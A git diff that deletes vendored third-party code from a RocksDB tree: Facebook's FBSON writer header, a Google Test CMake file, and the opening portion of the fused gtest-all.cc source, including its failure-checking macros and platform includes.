diff --git a/thirdparty/rocksdb/third-party/fbson/FbsonWriter.h b/thirdparty/rocksdb/third-party/fbson/FbsonWriter.h
deleted file mode 100644
index a254e9b..0000000
--- a/thirdparty/rocksdb/third-party/fbson/FbsonWriter.h
+++ /dev/null
@@ -1,430 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-/*
- * This file defines FbsonWriterT (template) and FbsonWriter.
- *
- * FbsonWriterT is a template class which implements an FBSON serializer.
- * Users call various write functions of FbsonWriterT object to write values
- * directly to FBSON packed bytes. All write functions of value or key return
- * the number of bytes written to FBSON, or 0 if there is an error. To write an
- * object, an array, or a string, you must call writeStart[..] before writing
- * values or key, and call writeEnd[..] after finishing at the end.
- *
- * By default, an FbsonWriterT object creates an output stream buffer.
- * Alternatively, you can also pass any output stream object to a writer, as
- * long as the stream object implements some basic functions of std::ostream
- * (such as FbsonOutStream, see FbsonStream.h).
- *
- * FbsonWriter specializes FbsonWriterT with FbsonOutStream type (see
- * FbsonStream.h). So unless you want to provide own a different output stream
- * type, use FbsonParser object.
- *
- * @author Tian Xia <tianx@fb.com>
- */
-
-#ifndef FBSON_FBSONWRITER_H
-#define FBSON_FBSONWRITER_H
-
-#include <stack>
-#include "FbsonDocument.h"
-#include "FbsonStream.h"
-
-namespace fbson {
-
-template <class OS_TYPE>
-class FbsonWriterT {
- public:
-  FbsonWriterT()
-      : alloc_(true), hasHdr_(false), kvState_(WS_Value), str_pos_(0) {
-    os_ = new OS_TYPE();
-  }
-
-  explicit FbsonWriterT(OS_TYPE& os)
-      : os_(&os),
-        alloc_(false),
-        hasHdr_(false),
-        kvState_(WS_Value),
-        str_pos_(0) {}
-
-  ~FbsonWriterT() {
-    if (alloc_) {
-      delete os_;
-    }
-  }
-
-  void reset() {
-    os_->clear();
-    os_->seekp(0);
-    hasHdr_ = false;
-    kvState_ = WS_Value;
-    for (; !stack_.empty(); stack_.pop())
-      ;
-  }
-
-  // write a key string (or key id if an external dict is provided)
-  uint32_t writeKey(const char* key,
-                    uint8_t len,
-                    hDictInsert handler = nullptr) {
-    if (len && !stack_.empty() && verifyKeyState()) {
-      int key_id = -1;
-      if (handler) {
-        key_id = handler(key, len);
-      }
-
-      uint32_t size = sizeof(uint8_t);
-      if (key_id < 0) {
-        os_->put(len);
-        os_->write(key, len);
-        size += len;
-      } else if (key_id <= FbsonKeyValue::sMaxKeyId) {
-        FbsonKeyValue::keyid_type idx = key_id;
-        os_->put(0);
-        os_->write((char*)&idx, sizeof(FbsonKeyValue::keyid_type));
-        size += sizeof(FbsonKeyValue::keyid_type);
-      } else { // key id overflow
-        assert(0);
-        return 0;
-      }
-
-      kvState_ = WS_Key;
-      return size;
-    }
-
-    return 0;
-  }
-
-  // write a key id
-  uint32_t writeKey(FbsonKeyValue::keyid_type idx) {
-    if (!stack_.empty() && verifyKeyState()) {
-      os_->put(0);
-      os_->write((char*)&idx, sizeof(FbsonKeyValue::keyid_type));
-      kvState_ = WS_Key;
-      return sizeof(uint8_t) + sizeof(FbsonKeyValue::keyid_type);
-    }
-
-    return 0;
-  }
-
-  uint32_t writeNull() {
-    if (!stack_.empty() && verifyValueState()) {
-      os_->put((FbsonTypeUnder)FbsonType::T_Null);
-      kvState_ = WS_Value;
-      return sizeof(FbsonValue);
-    }
-
-    return 0;
-  }
-
-  uint32_t writeBool(bool b) {
-    if (!stack_.empty() && verifyValueState()) {
-      if (b) {
-        os_->put((FbsonTypeUnder)FbsonType::T_True);
-      } else {
-        os_->put((FbsonTypeUnder)FbsonType::T_False);
-      }
-
-      kvState_ = WS_Value;
-      return sizeof(FbsonValue);
-    }
-
-    return 0;
-  }
-
-  uint32_t writeInt8(int8_t v) {
-    if (!stack_.empty() && verifyValueState()) {
-      os_->put((FbsonTypeUnder)FbsonType::T_Int8);
-      os_->put(v);
-      kvState_ = WS_Value;
-      return sizeof(Int8Val);
-    }
-
-    return 0;
-  }
-
-  uint32_t writeInt16(int16_t v) {
-    if (!stack_.empty() && verifyValueState()) {
-      os_->put((FbsonTypeUnder)FbsonType::T_Int16);
-      os_->write((char*)&v, sizeof(int16_t));
-      kvState_ = WS_Value;
-      return sizeof(Int16Val);
-    }
-
-    return 0;
-  }
-
-  uint32_t writeInt32(int32_t v) {
-    if (!stack_.empty() && verifyValueState()) {
-      os_->put((FbsonTypeUnder)FbsonType::T_Int32);
-      os_->write((char*)&v, sizeof(int32_t));
-      kvState_ = WS_Value;
-      return sizeof(Int32Val);
-    }
-
-    return 0;
-  }
-
-  uint32_t writeInt64(int64_t v) {
-    if (!stack_.empty() && verifyValueState()) {
-      os_->put((FbsonTypeUnder)FbsonType::T_Int64);
-      os_->write((char*)&v, sizeof(int64_t));
-      kvState_ = WS_Value;
-      return sizeof(Int64Val);
-    }
-
-    return 0;
-  }
-
-  uint32_t writeDouble(double v) {
-    if (!stack_.empty() && verifyValueState()) {
-      os_->put((FbsonTypeUnder)FbsonType::T_Double);
-      os_->write((char*)&v, sizeof(double));
-      kvState_ = WS_Value;
-      return sizeof(DoubleVal);
-    }
-
-    return 0;
-  }
-
-  // must call writeStartString before writing a string val
-  bool writeStartString() {
-    if (!stack_.empty() && verifyValueState()) {
-      os_->put((FbsonTypeUnder)FbsonType::T_String);
-      str_pos_ = os_->tellp();
-
-      // fill the size bytes with 0 for now
-      uint32_t size = 0;
-      os_->write((char*)&size, sizeof(uint32_t));
-
-      kvState_ = WS_String;
-      return true;
-    }
-
-    return false;
-  }
-
-  // finish writing a string val
-  bool writeEndString() {
-    if (kvState_ == WS_String) {
-      std::streampos cur_pos = os_->tellp();
-      int32_t size = (int32_t)(cur_pos - str_pos_ - sizeof(uint32_t));
-      assert(size >= 0);
-
-      os_->seekp(str_pos_);
-      os_->write((char*)&size, sizeof(uint32_t));
-      os_->seekp(cur_pos);
-
-      kvState_ = WS_Value;
-      return true;
-    }
-
-    return false;
-  }
-
-  uint32_t writeString(const char* str, uint32_t len) {
-    if (kvState_ == WS_String) {
-      os_->write(str, len);
-      return len;
-    }
-
-    return 0;
-  }
-
-  uint32_t writeString(char ch) {
-    if (kvState_ == WS_String) {
-      os_->put(ch);
-      return 1;
-    }
-
-    return 0;
-  }
-
-  // must call writeStartBinary before writing a binary val
-  bool writeStartBinary() {
-    if (!stack_.empty() && verifyValueState()) {
-      os_->put((FbsonTypeUnder)FbsonType::T_Binary);
-      str_pos_ = os_->tellp();
-
-      // fill the size bytes with 0 for now
-      uint32_t size = 0;
-      os_->write((char*)&size, sizeof(uint32_t));
-
-      kvState_ = WS_Binary;
-      return true;
-    }
-
-    return false;
-  }
-
-  // finish writing a binary val
-  bool writeEndBinary() {
-    if (kvState_ == WS_Binary) {
-      std::streampos cur_pos = os_->tellp();
-      int32_t size = (int32_t)(cur_pos - str_pos_ - sizeof(uint32_t));
-      assert(size >= 0);
-
-      os_->seekp(str_pos_);
-      os_->write((char*)&size, sizeof(uint32_t));
-      os_->seekp(cur_pos);
-
-      kvState_ = WS_Value;
-      return true;
-    }
-
-    return false;
-  }
-
-  uint32_t writeBinary(const char* bin, uint32_t len) {
-    if (kvState_ == WS_Binary) {
-      os_->write(bin, len);
-      return len;
-    }
-
-    return 0;
-  }
-
-  // must call writeStartObject before writing an object val
-  bool writeStartObject() {
-    if (stack_.empty() || verifyValueState()) {
-      if (stack_.empty()) {
-        // if this is a new FBSON, write the header
-        if (!hasHdr_) {
-          writeHeader();
-        } else
-          return false;
-      }
-
-      os_->put((FbsonTypeUnder)FbsonType::T_Object);
-      // save the size position
-      stack_.push(WriteInfo({WS_Object, os_->tellp()}));
-
-      // fill the size bytes with 0 for now
-      uint32_t size = 0;
-      os_->write((char*)&size, sizeof(uint32_t));
-
-      kvState_ = WS_Value;
-      return true;
-    }
-
-    return false;
-  }
-
-  // finish writing an object val
-  bool writeEndObject() {
-    if (!stack_.empty() && stack_.top().state == WS_Object &&
-        kvState_ == WS_Value) {
-      WriteInfo& ci = stack_.top();
-      std::streampos cur_pos = os_->tellp();
-      int32_t size = (int32_t)(cur_pos - ci.sz_pos - sizeof(uint32_t));
-      assert(size >= 0);
-
-      os_->seekp(ci.sz_pos);
-      os_->write((char*)&size, sizeof(uint32_t));
-      os_->seekp(cur_pos);
-      stack_.pop();
-
-      return true;
-    }
-
-    return false;
-  }
-
-  // must call writeStartArray before writing an array val
-  bool writeStartArray() {
-    if (stack_.empty() || verifyValueState()) {
-      if (stack_.empty()) {
-        // if this is a new FBSON, write the header
-        if (!hasHdr_) {
-          writeHeader();
-        } else
-          return false;
-      }
-
-      os_->put((FbsonTypeUnder)FbsonType::T_Array);
-      // save the size position
-      stack_.push(WriteInfo({WS_Array, os_->tellp()}));
-
-      // fill the size bytes with 0 for now
-      uint32_t size = 0;
-      os_->write((char*)&size, sizeof(uint32_t));
-
-      kvState_ = WS_Value;
-      return true;
-    }
-
-    return false;
-  }
-
-  // finish writing an array val
-  bool writeEndArray() {
-    if (!stack_.empty() && stack_.top().state == WS_Array &&
-        kvState_ == WS_Value) {
-      WriteInfo& ci = stack_.top();
-      std::streampos cur_pos = os_->tellp();
-      int32_t size = (int32_t)(cur_pos - ci.sz_pos - sizeof(uint32_t));
-      assert(size >= 0);
-
-      os_->seekp(ci.sz_pos);
-      os_->write((char*)&size, sizeof(uint32_t));
-      os_->seekp(cur_pos);
-      stack_.pop();
-
-      return true;
-    }
-
-    return false;
-  }
-
-  OS_TYPE* getOutput() { return os_; }
-
- private:
-  // verify we are in the right state before writing a value
-  bool verifyValueState() {
-    assert(!stack_.empty());
-    return (stack_.top().state == WS_Object && kvState_ == WS_Key) ||
-           (stack_.top().state == WS_Array && kvState_ == WS_Value);
-  }
-
-  // verify we are in the right state before writing a key
-  bool verifyKeyState() {
-    assert(!stack_.empty());
-    return stack_.top().state == WS_Object && kvState_ == WS_Value;
-  }
-
-  void writeHeader() {
-    os_->put(FBSON_VER);
-    hasHdr_ = true;
-  }
-
- private:
-  enum WriteState {
-    WS_NONE,
-    WS_Array,
-    WS_Object,
-    WS_Key,
-    WS_Value,
-    WS_String,
-    WS_Binary,
-  };
-
-  struct WriteInfo {
-    WriteState state;
-    std::streampos sz_pos;
-  };
-
- private:
-  OS_TYPE* os_;
-  bool alloc_;
-  bool hasHdr_;
-  WriteState kvState_; // key or value state
-  std::streampos str_pos_;
-  std::stack<WriteInfo> stack_;
-};
-
-typedef FbsonWriterT<FbsonOutStream> FbsonWriter;
-
-} // namespace fbson
-
-#endif // FBSON_FBSONWRITER_H
diff --git a/thirdparty/rocksdb/third-party/gtest-1.7.0/fused-src/gtest/CMakeLists.txt b/thirdparty/rocksdb/third-party/gtest-1.7.0/fused-src/gtest/CMakeLists.txt
deleted file mode 100644
index 90cff08..0000000
--- a/thirdparty/rocksdb/third-party/gtest-1.7.0/fused-src/gtest/CMakeLists.txt
+++ /dev/null
@@ -1 +0,0 @@
-add_library(gtest gtest-all.cc)
diff --git a/thirdparty/rocksdb/third-party/gtest-1.7.0/fused-src/gtest/gtest-all.cc b/thirdparty/rocksdb/third-party/gtest-1.7.0/fused-src/gtest/gtest-all.cc
deleted file mode 100644
index 7c52172..0000000
--- a/thirdparty/rocksdb/third-party/gtest-1.7.0/fused-src/gtest/gtest-all.cc
+++ /dev/null
@@ -1,10261 +0,0 @@
-// Copyright 2008, Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Author: mheule@google.com (Markus Heule)
-//
-// Google C++ Testing Framework (Google Test)
-//
-// Sometimes it's desirable to build Google Test by compiling a single file.
-// This file serves this purpose.
-
-// Suppress clang analyzer warnings.
-#ifndef __clang_analyzer__
-
-// This line ensures that gtest.h can be compiled on its own, even
-// when it's fused.
-#include "gtest/gtest.h"
-
-// The following lines pull in the real gtest *.cc files.
-// Copyright 2005, Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Author: wan@google.com (Zhanyong Wan)
-//
-// The Google C++ Testing Framework (Google Test)
-
-// Copyright 2007, Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Author: wan@google.com (Zhanyong Wan)
-//
-// Utilities for testing Google Test itself and code that uses Google Test
-// (e.g. frameworks built on top of Google Test).
-
-#ifndef GTEST_INCLUDE_GTEST_GTEST_SPI_H_
-#define GTEST_INCLUDE_GTEST_GTEST_SPI_H_
-
-namespace testing {
-
-// This helper class can be used to mock out Google Test failure reporting
-// so that we can test Google Test or code that builds on Google Test.
-//
-// An object of this class appends a TestPartResult object to the
-// TestPartResultArray object given in the constructor whenever a Google Test
-// failure is reported. It can either intercept only failures that are
-// generated in the same thread that created this object or it can intercept
-// all generated failures. The scope of this mock object can be controlled with
-// the second argument to the two arguments constructor.
-class GTEST_API_ ScopedFakeTestPartResultReporter
-    : public TestPartResultReporterInterface {
- public:
-  // The two possible mocking modes of this object.
-  enum InterceptMode {
-    INTERCEPT_ONLY_CURRENT_THREAD,  // Intercepts only thread local failures.
-    INTERCEPT_ALL_THREADS           // Intercepts all failures.
-  };
-
-  // The c'tor sets this object as the test part result reporter used
-  // by Google Test.  The 'result' parameter specifies where to report the
-  // results. This reporter will only catch failures generated in the current
-  // thread. DEPRECATED
-  explicit ScopedFakeTestPartResultReporter(TestPartResultArray* result);
-
-  // Same as above, but you can choose the interception scope of this object.
-  ScopedFakeTestPartResultReporter(InterceptMode intercept_mode,
-                                   TestPartResultArray* result);
-
-  // The d'tor restores the previous test part result reporter.
-  virtual ~ScopedFakeTestPartResultReporter();
-
-  // Appends the TestPartResult object to the TestPartResultArray
-  // received in the constructor.
-  //
-  // This method is from the TestPartResultReporterInterface
-  // interface.
-  virtual void ReportTestPartResult(const TestPartResult& result);
- private:
-  void Init();
-
-  const InterceptMode intercept_mode_;
-  TestPartResultReporterInterface* old_reporter_;
-  TestPartResultArray* const result_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(ScopedFakeTestPartResultReporter);
-};
-
-namespace internal {
-
-// A helper class for implementing EXPECT_FATAL_FAILURE() and
-// EXPECT_NONFATAL_FAILURE().  Its destructor verifies that the given
-// TestPartResultArray contains exactly one failure that has the given
-// type and contains the given substring.  If that's not the case, a
-// non-fatal failure will be generated.
-class GTEST_API_ SingleFailureChecker {
- public:
-  // The constructor remembers the arguments.
-  SingleFailureChecker(const TestPartResultArray* results,
-                       TestPartResult::Type type,
-                       const string& substr);
-  ~SingleFailureChecker();
- private:
-  const TestPartResultArray* const results_;
-  const TestPartResult::Type type_;
-  const string substr_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(SingleFailureChecker);
-};
-
-}  // namespace internal
-
-}  // namespace testing
-
-// A set of macros for testing Google Test assertions or code that's expected
-// to generate Google Test fatal failures.  It verifies that the given
-// statement will cause exactly one fatal Google Test failure with 'substr'
-// being part of the failure message.
-//
-// There are two different versions of this macro. EXPECT_FATAL_FAILURE only
-// affects and considers failures generated in the current thread and
-// EXPECT_FATAL_FAILURE_ON_ALL_THREADS does the same but for all threads.
-//
-// The verification of the assertion is done correctly even when the statement
-// throws an exception or aborts the current function.
-//
-// Known restrictions:
-//   - 'statement' cannot reference local non-static variables or
-//     non-static members of the current object.
-//   - 'statement' cannot return a value.
-//   - You cannot stream a failure message to this macro.
-//
-// Note that even though the implementations of the following two
-// macros are much alike, we cannot refactor them to use a common
-// helper macro, due to some peculiarity in how the preprocessor
-// works.  The AcceptsMacroThatExpandsToUnprotectedComma test in
-// gtest_unittest.cc will fail to compile if we do that.
-#define EXPECT_FATAL_FAILURE(statement, substr) \
-  do { \
-    class GTestExpectFatalFailureHelper {\
-     public:\
-      static void Execute() { statement; }\
-    };\
-    ::testing::TestPartResultArray gtest_failures;\
-    ::testing::internal::SingleFailureChecker gtest_checker(\
-        &gtest_failures, ::testing::TestPartResult::kFatalFailure, (substr));\
-    {\
-      ::testing::ScopedFakeTestPartResultReporter gtest_reporter(\
-          ::testing::ScopedFakeTestPartResultReporter:: \
-          INTERCEPT_ONLY_CURRENT_THREAD, &gtest_failures);\
-      GTestExpectFatalFailureHelper::Execute();\
-    }\
-  } while (::testing::internal::AlwaysFalse())
-
-#define EXPECT_FATAL_FAILURE_ON_ALL_THREADS(statement, substr) \
-  do { \
-    class GTestExpectFatalFailureHelper {\
-     public:\
-      static void Execute() { statement; }\
-    };\
-    ::testing::TestPartResultArray gtest_failures;\
-    ::testing::internal::SingleFailureChecker gtest_checker(\
-        &gtest_failures, ::testing::TestPartResult::kFatalFailure, (substr));\
-    {\
-      ::testing::ScopedFakeTestPartResultReporter gtest_reporter(\
-          ::testing::ScopedFakeTestPartResultReporter:: \
-          INTERCEPT_ALL_THREADS, &gtest_failures);\
-      GTestExpectFatalFailureHelper::Execute();\
-    }\
-  } while (::testing::internal::AlwaysFalse())
-
-// A macro for testing Google Test assertions or code that's expected to
-// generate Google Test non-fatal failures.  It asserts that the given
-// statement will cause exactly one non-fatal Google Test failure with 'substr'
-// being part of the failure message.
-//
-// There are two different versions of this macro. EXPECT_NONFATAL_FAILURE only
-// affects and considers failures generated in the current thread and
-// EXPECT_NONFATAL_FAILURE_ON_ALL_THREADS does the same but for all threads.
-//
-// 'statement' is allowed to reference local variables and members of
-// the current object.
-//
-// The verification of the assertion is done correctly even when the statement
-// throws an exception or aborts the current function.
-//
-// Known restrictions:
-//   - You cannot stream a failure message to this macro.
-//
-// Note that even though the implementations of the following two
-// macros are much alike, we cannot refactor them to use a common
-// helper macro, due to some peculiarity in how the preprocessor
-// works.  If we do that, the code won't compile when the user gives
-// EXPECT_NONFATAL_FAILURE() a statement that contains a macro that
-// expands to code containing an unprotected comma.  The
-// AcceptsMacroThatExpandsToUnprotectedComma test in gtest_unittest.cc
-// catches that.
-//
-// For the same reason, we have to write
-//   if (::testing::internal::AlwaysTrue()) { statement; }
-// instead of
-//   GTEST_SUPPRESS_UNREACHABLE_CODE_WARNING_BELOW_(statement)
-// to avoid an MSVC warning on unreachable code.
-#define EXPECT_NONFATAL_FAILURE(statement, substr) \
-  do {\
-    ::testing::TestPartResultArray gtest_failures;\
-    ::testing::internal::SingleFailureChecker gtest_checker(\
-        &gtest_failures, ::testing::TestPartResult::kNonFatalFailure, \
-        (substr));\
-    {\
-      ::testing::ScopedFakeTestPartResultReporter gtest_reporter(\
-          ::testing::ScopedFakeTestPartResultReporter:: \
-          INTERCEPT_ONLY_CURRENT_THREAD, &gtest_failures);\
-      if (::testing::internal::AlwaysTrue()) { statement; }\
-    }\
-  } while (::testing::internal::AlwaysFalse())
-
-#define EXPECT_NONFATAL_FAILURE_ON_ALL_THREADS(statement, substr) \
-  do {\
-    ::testing::TestPartResultArray gtest_failures;\
-    ::testing::internal::SingleFailureChecker gtest_checker(\
-        &gtest_failures, ::testing::TestPartResult::kNonFatalFailure, \
-        (substr));\
-    {\
-      ::testing::ScopedFakeTestPartResultReporter gtest_reporter(\
-          ::testing::ScopedFakeTestPartResultReporter::INTERCEPT_ALL_THREADS, \
-          &gtest_failures);\
-      if (::testing::internal::AlwaysTrue()) { statement; }\
-    }\
-  } while (::testing::internal::AlwaysFalse())
-
-#endif  // GTEST_INCLUDE_GTEST_GTEST_SPI_H_
-
-#include <ctype.h>
-#include <math.h>
-#include <stdarg.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <time.h>
-#include <wchar.h>
-#include <wctype.h>
-
-#include <algorithm>
-#include <iomanip>
-#include <limits>
-#include <list>
-#include <map>
-#include <ostream>  // NOLINT
-#include <sstream>
-#include <vector>
-
-#if GTEST_OS_LINUX
-
-// TODO(kenton@google.com): Use autoconf to detect availability of
-// gettimeofday().
-# define GTEST_HAS_GETTIMEOFDAY_ 1
-
-# include <fcntl.h>  // NOLINT
-# include <limits.h>  // NOLINT
-# include <sched.h>  // NOLINT
-// Declares vsnprintf().  This header is not available on Windows.
-# include <strings.h>  // NOLINT
-# include <sys/mman.h>  // NOLINT
-# include <sys/time.h>  // NOLINT
-# include <unistd.h>  // NOLINT
-# include <string>
-
-#elif GTEST_OS_SYMBIAN
-# define GTEST_HAS_GETTIMEOFDAY_ 1
-# include <sys/time.h>  // NOLINT
-
-#elif GTEST_OS_ZOS
-# define GTEST_HAS_GETTIMEOFDAY_ 1
-# include <sys/time.h>  // NOLINT
-
-// On z/OS we additionally need strings.h for strcasecmp.
-# include <strings.h>  // NOLINT
-
-#elif GTEST_OS_WINDOWS_MOBILE  // We are on Windows CE.
-
-# include <windows.h>  // NOLINT
-# undef min
-
-#elif GTEST_OS_WINDOWS  // We are on Windows proper.
-
-# include <io.h>  // NOLINT
-# include <sys/timeb.h>  // NOLINT
-# include <sys/types.h>  // NOLINT
-# include <sys/stat.h>  // NOLINT
-
-# if GTEST_OS_WINDOWS_MINGW
-// MinGW has gettimeofday() but not _ftime64().
-// TODO(kenton@google.com): Use autoconf to detect availability of
-//   gettimeofday().
-// TODO(kenton@google.com): There are other ways to get the time on
-//   Windows, like GetTickCount() or GetSystemTimeAsFileTime().  MinGW
-//   supports these.  consider using them instead.
-#  define GTEST_HAS_GETTIMEOFDAY_ 1
-#  include <sys/time.h>  // NOLINT
-# endif  // GTEST_OS_WINDOWS_MINGW
-
-// cpplint thinks that the header is already included, so we want to
-// silence it.
-# include <windows.h>  // NOLINT
-# undef min
-
-#else
-
-// Assume other platforms have gettimeofday().
-// TODO(kenton@google.com): Use autoconf to detect availability of
-//   gettimeofday().
-# define GTEST_HAS_GETTIMEOFDAY_ 1
-
-// cpplint thinks that the header is already included, so we want to
-// silence it.
-# include <sys/time.h>  // NOLINT
-# include <unistd.h>  // NOLINT
-
-#endif  // GTEST_OS_LINUX
-
-#if GTEST_HAS_EXCEPTIONS
-# include <stdexcept>
-#endif
-
-#if GTEST_CAN_STREAM_RESULTS_
-# include <arpa/inet.h>  // NOLINT
-# include <netdb.h>  // NOLINT
-# include <sys/socket.h>  // NOLINT
-# include <sys/types.h>  // NOLINT
-#endif
-
-// Indicates that this translation unit is part of Google Test's
-// implementation.  It must come before gtest-internal-inl.h is
-// included, or there will be a compiler error.  This trick is to
-// prevent a user from accidentally including gtest-internal-inl.h in
-// his code.
-#define GTEST_IMPLEMENTATION_ 1
-// Copyright 2005, Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-
-// Utility functions and classes used by the Google C++ testing framework.
-//
-// Author: wan@google.com (Zhanyong Wan)
-//
-// This file contains purely Google Test's internal implementation.  Please
-// DO NOT #INCLUDE IT IN A USER PROGRAM.
-
-#ifndef GTEST_SRC_GTEST_INTERNAL_INL_H_
-#define GTEST_SRC_GTEST_INTERNAL_INL_H_
-
-// GTEST_IMPLEMENTATION_ is defined to 1 iff the current translation unit is
-// part of Google Test's implementation; otherwise it's undefined.
-#if !GTEST_IMPLEMENTATION_
-// If this file is included from the user's code, just say no.
-# error "gtest-internal-inl.h is part of Google Test's internal implementation."
-# error "It must not be included except by Google Test itself."
-#endif  // GTEST_IMPLEMENTATION_
-
-#ifndef _WIN32_WCE
-# include <errno.h>
-#endif  // !_WIN32_WCE
-#include <stddef.h>
-#include <stdlib.h>  // For strtoll/_strtoul64/malloc/free.
-#include <string.h>  // For memmove.
-
-#include <algorithm>
-#include <string>
-#include <vector>
-
-
-#if GTEST_CAN_STREAM_RESULTS_
-# include <arpa/inet.h>  // NOLINT
-# include <netdb.h>  // NOLINT
-#endif
-
-#if GTEST_OS_WINDOWS
-# include <windows.h>  // NOLINT
-#endif  // GTEST_OS_WINDOWS
-
-
-namespace testing {
-
-// Declares the flags.
-//
-// We don't want the users to modify this flag in the code, but want
-// Google Test's own unit tests to be able to access it. Therefore we
